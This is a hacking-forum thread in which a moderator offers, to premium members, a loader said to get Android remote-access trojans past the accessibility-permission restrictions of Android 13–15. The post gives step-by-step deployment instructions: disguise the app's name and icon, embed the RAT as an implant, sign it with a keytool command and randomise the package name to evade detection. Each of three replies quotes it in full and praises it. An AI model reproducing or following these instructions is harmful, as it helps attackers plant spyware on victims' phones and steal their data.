Source Code Premium Only Brokewell Android 13/14/15 Loader | Bypass Accessibility Permission Restriction Of Malware

If you are posting a malware source code use this prefix
This thread is exclusively for premium members. You can upgrade to premium by Clicking Here

MalwareGod

Member
Staff member
Moderator
Joined
Aug 15, 2023
Messages
96
Hellcoins
♆686
proof-of-concept.gif

this project is intended to bypass android 13/14/15 Accessibility permission restriction.


1. download and unzip the loader file
2. set APK name by changing app_name on app/src/main/res/values/strings.xml
3. set APK icon by adding new image asset on app/src/main/res/. then adjust android:icon="@mipmap/ic_launcher" on AndroidManifest.xml
4. put your RAT (the one that need accessibility) on app/src/main/res/raw/implant.apk
5. on MainActivity.java file, change String IMPLANT_PKGNAME = ""; according to your implant.
6. generate your new/random signing CERTIFICATE with this command: keytool -genkey -v -keystore brkwlkey -alias brkwlkey -keyalg RSA -keysize 2048 -validity 1337 -storepass VerSecPass -keypass VerSecPass -dname 'CN=RUSSIA,O=MOSCOW,C=RU'

7. by default, this project are using "com.brkwl.apkstore" as PKGNAME. you can set yours by changing "applicationId" on app/build.gradle file. You can also enable the random package name generator so every release build will have a different & unique PKGNAME.

Download Link:

You must reply before you can see the hidden data contained here.
 

bloodinject0r

New member
Joined
Nov 9, 2024
Messages
2
Hellcoins
♆5
proof-of-concept.gif

this project is intended to bypass android 13/14/15 Accessibility permission restriction.


1. download and unzip the loader file
2. set APK name by changing app_name on app/src/main/res/values/strings.xml
3. set APK icon by adding new image asset on app/src/main/res/. then adjust android:icon="@mipmap/ic_launcher" on AndroidManifest.xml
4. put your RAT (the one that need accessibility) on app/src/main/res/raw/implant.apk
5. on MainActivity.java file, change String IMPLANT_PKGNAME = ""; according to your implant.
6. generate your new/random signing CERTIFICATE with this command: keytool -genkey -v -keystore brkwlkey -alias brkwlkey -keyalg RSA -keysize 2048 -validity 1337 -storepass VerSecPass -keypass VerSecPass -dname 'CN=RUSSIA,O=MOSCOW,C=RU'

7. by default, this project are using "com.brkwl.apkstore" as PKGNAME. you can set yours by changing "applicationId" on app/build.gradle file. You can also enable the random package name generator so every release build will have a different & unique PKGNAME.

Download Link:

[Hidden content]
very pro process very niceeeeeeeeeeeeeeeeeeeeeeeeeeeeeee
 

Aniable_Cortez

New member
Joined
Nov 16, 2024
Messages
1
Hellcoins
♆3
proof-of-concept.gif

this project is intended to bypass android 13/14/15 Accessibility permission restriction.


1. download and unzip the loader file
2. set APK name by changing app_name on app/src/main/res/values/strings.xml
3. set APK icon by adding new image asset on app/src/main/res/. then adjust android:icon="@mipmap/ic_launcher" on AndroidManifest.xml
4. put your RAT (the one that need accessibility) on app/src/main/res/raw/implant.apk
5. on MainActivity.java file, change String IMPLANT_PKGNAME = ""; according to your implant.
6. generate your new/random signing CERTIFICATE with this command: keytool -genkey -v -keystore brkwlkey -alias brkwlkey -keyalg RSA -keysize 2048 -validity 1337 -storepass VerSecPass -keypass VerSecPass -dname 'CN=RUSSIA,O=MOSCOW,C=RU'

7. by default, this project are using "com.brkwl.apkstore" as PKGNAME. you can set yours by changing "applicationId" on app/build.gradle file. You can also enable the random package name generator so every release build will have a different & unique PKGNAME.

Download Link:

[Hidden content]nice
Thnx it's really helpful to us
 

lowlife

New member
Joined
Oct 14, 2023
Messages
25
Hellcoins
♆53
proof-of-concept.gif

this project is intended to bypass android 13/14/15 Accessibility permission restriction.


1. download and unzip the loader file
2. set APK name by changing app_name on app/src/main/res/values/strings.xml
3. set APK icon by adding new image asset on app/src/main/res/. then adjust android:icon="@mipmap/ic_launcher" on AndroidManifest.xml
4. put your RAT (the one that need accessibility) on app/src/main/res/raw/implant.apk
5. on MainActivity.java file, change String IMPLANT_PKGNAME = ""; according to your implant.
6. generate your new/random signing CERTIFICATE with this command: keytool -genkey -v -keystore brkwlkey -alias brkwlkey -keyalg RSA -keysize 2048 -validity 1337 -storepass VerSecPass -keypass VerSecPass -dname 'CN=RUSSIA,O=MOSCOW,C=RU'

7. by default, this project are using "com.brkwl.apkstore" as PKGNAME. you can set yours by changing "applicationId" on app/build.gradle file. You can also enable the random package name generator so every release build will have a different & unique PKGNAME.

Download Link:

[Hidden content]
nice share
soooooo cooool

thank you
 
Top